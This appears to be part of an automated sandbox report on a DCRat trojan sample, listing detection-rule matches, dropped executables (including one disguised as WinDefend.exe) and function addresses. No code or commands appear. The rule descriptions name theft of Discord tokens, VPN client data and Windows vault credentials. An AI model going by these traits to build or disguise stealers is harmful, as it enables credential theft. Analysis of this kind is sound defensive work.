Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 20.2.Loader.exe.1d000000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 00000014.00000002.2814130598.000000001D000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000003.00000002.2032453597.0000000002301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000012.00000002.2097619560.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.000000000313B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.0000000003126000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000003.00000002.2031490283.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3532252741.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000012.00000002.2087235357.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Loaader.exe PID: 7280, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen

PE file contains section with special chars

Source: WinDefend.exe.0.dr

Static PE information: section name: %q2hF6

PE file has nameless sections

Source: WinDefend.exe.0.dr

Static PE information: section name:

Very long command line found

Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Commandline size = 13369
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Commandline size = 13369
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Commandline size = 13369
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Commandline size = 13369

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F03D5E NtProtectVirtualMemory,	2_2_00007FF848F03D5E
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Code function: 3_2_00007FF848F131DE NtProtectVirtualMemory,	3_2_00007FF848F131DE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 18_2_00007FF848F431DE NtProtectVirtualMemory,	18_2_00007FF848F431DE
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F13D6E NtProtectVirtualMemory,	19_2_00007FF848F13D6E
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F14048 NtProtectVirtualMemory,	19_2_00007FF848F14048
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F33DBE NtProtectVirtualMemory,	20_2_00007FF848F33DBE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F031DE NtProtectVirtualMemory,	21_2_00007FF848F031DE

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F03D5E	2_2_00007FF848F03D5E
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F00E5D	2_2_00007FF848F00E5D
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F00E70	2_2_00007FF848F00E70
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Code function: 3_2_00007FF848F131DE	3_2_00007FF848F131DE
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Code function: 3_2_00007FF848F12AED	3_2_00007FF848F12AED
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF32D0	4_2_02CF32D0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF3B50	4_2_02CF3B50
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF0848	4_2_02CF0848
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF16E7	4_2_02CF16E7
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF5480	4_2_02CF5480
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF8C78	4_2_02CF8C78
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF45C0	4_2_02CF45C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6288	4_2_02CF6288
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6298	4_2_02CF6298
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6294	4_2_02CF6294
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF32A7	4_2_02CF32A7
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF78C0	4_2_02CF78C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF70A8	4_2_02CF70A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF70B4	4_2_02CF70B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF78B0	4_2_02CF78B0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF0838	4_2_02CF0838
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7648	4_2_02CF7648
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7639	4_2_02CF7639
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF2748	4_2_02CF2748
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF2739	4_2_02CF2739
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF546F	4_2_02CF546F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF8C67	4_2_02CF8C67
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7418	4_2_02CF7418
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7428	4_2_02CF7428
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7425	4_2_02CF7425
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6D9D	4_2_02CF6D9D
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6D90	4_2_02CF6D90
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6DA0	4_2_02CF6DA0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F50C18	4_2_04F50C18
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F517B8	4_2_04F517B8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F50C0F	4_2_04F50C0F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F51274	4_2_04F51274
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F5125F	4_2_04F5125F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F517A8	4_2_04F517A8
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 18_2_00007FF848F431DE	18_2_00007FF848F431DE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 18_2_00007FF848F42AED	18_2_00007FF848F42AED
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F10E5D	19_2_00007FF848F10E5D
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F13D6E	19_2_00007FF848F13D6E
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F10E70	19_2_00007FF848F10E70
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F41A28	20_2_00007FF848F41A28
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F41961	20_2_00007FF848F41961
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F3BCD2	20_2_00007FF848F3BCD2
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F43B28	20_2_00007FF848F43B28
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F30E5D	20_2_00007FF848F30E5D
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F6A6B8	20_2_00007FF848F6A6B8
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F43D88	20_2_00007FF848F43D88
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F33DBE	20_2_00007FF848F33DBE
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F3AF26	20_2_00007FF848F3AF26
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F6A730	20_2_00007FF848F6A730
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F42F38	20_2_00007FF848F42F38
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F42FD8	20_2_00007FF848F42FD8
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F41A30	20_2_00007FF848F41A30
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F41A89	20_2_00007FF848F41A89
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F30E70	20_2_00007FF848F30E70
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F42D10	20_2_00007FF848F42D10
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF849120350	20_2_00007FF849120350
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F031DE	21_2_00007FF848F031DE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F10A7D	21_2_00007FF848F10A7D
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F09296	21_2_00007FF848F09296
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F02AED	21_2_00007FF848F02AED
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0E99D	21_2_00007FF848F0E99D
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F043CD	21_2_00007FF848F043CD
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0D38F	21_2_00007FF848F0D38F
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F10BC5	21_2_00007FF848F10BC5
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F10D98	21_2_00007FF848F10D98
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F10DD0	21_2_00007FF848F10DD0
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0A042	21_2_00007FF848F0A042
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F1005A	21_2_00007FF848F1005A
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0FFF0	21_2_00007FF848F0FFF0
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490F221E	21_2_00007FF8490F221E
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D5990	21_2_00007FF8490D5990
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D0CCF	21_2_00007FF8490D0CCF
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EBCF4	21_2_00007FF8490EBCF4
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490F3386	21_2_00007FF8490F3386
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D3BDA	21_2_00007FF8490D3BDA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E6E80	21_2_00007FF8490E6E80
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E6EC0	21_2_00007FF8490E6EC0
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490DAFFD	21_2_00007FF8490DAFFD
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EA890	21_2_00007FF8490EA890
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490FC8AE	21_2_00007FF8490FC8AE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D4AD3	21_2_00007FF8490D4AD3
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D38FA	21_2_00007FF8490D38FA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E0119	21_2_00007FF8490E0119
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D51F2	21_2_00007FF8490D51F2
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EEB15	21_2_00007FF8490EEB15
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D4B10	21_2_00007FF8490D4B10
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EF328	21_2_00007FF8490EF328
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EEBF6	21_2_00007FF8490EEBF6
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D5605	21_2_00007FF8490D5605
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D4DF8	21_2_00007FF8490D4DF8
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D46D3	21_2_00007FF8490D46D3
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D46C8	21_2_00007FF8490D46C8
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E0D69	21_2_00007FF8490E0D69
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EDD90	21_2_00007FF8490EDD90
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EDD79	21_2_00007FF8490EDD79
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E5048	21_2_00007FF8490E5048
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490ED058	21_2_00007FF8490ED058
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D4EFA	21_2_00007FF8490D4EFA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EAF4D	21_2_00007FF8490EAF4D
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490DF7CD	21_2_00007FF8490DF7CD
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01520848	22_2_01520848
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01523B50	22_2_01523B50
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015232D0	22_2_015232D0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015245C0	22_2_015245C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01528C78	22_2_01528C78
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01525480	22_2_01525480
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01521664	22_2_01521664
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01520838	22_2_01520838
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015278C0	22_2_015278C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015278B0	22_2_015278B0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015270A8	22_2_015270A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01525399	22_2_01525399
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01523261	22_2_01523261
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01526298	22_2_01526298
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01526288	22_2_01526288
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01526D90	22_2_01526D90
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01526DA0	22_2_01526DA0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01527418	22_2_01527418
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01528C20	22_2_01528C20
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01527428	22_2_01527428
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01522748	22_2_01522748
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01522739	22_2_01522739
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01527648	22_2_01527648
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01527639	22_2_01527639
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_0544A388	22_2_0544A388
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_0544A398	22_2_0544A398
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_054483B4	22_2_054483B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DD97B4	22_2_05DD97B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DD9F48	22_2_05DD9F48
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDEEF0	22_2_05DDEEF0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DD7E71	22_2_05DD7E71
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDE8F8	22_2_05DDE8F8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDD290	22_2_05DDD290
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DD9D69	22_2_05DD9D69
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDF770	22_2_05DDF770
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDEEE0	22_2_05DDEEE0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDE8E9	22_2_05DDE8E9
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDF348	22_2_05DDF348
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C17B8	22_2_062C17B8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C0C18	22_2_062C0C18
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C1274	22_2_062C1274
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C125F	22_2_062C125F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C17A8	22_2_062C17A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C0C08	22_2_062C0C08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF848FD323D	25_2_00007FF848FD323D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF848FD8D9E	25_2_00007FF848FD8D9E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF848FD531A	25_2_00007FF848FD531A
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01130848	31_2_01130848
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01133B50	31_2_01133B50
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011332D0	31_2_011332D0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011345C0	31_2_011345C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01138C78	31_2_01138C78
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01135480	31_2_01135480
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0113161E	31_2_0113161E
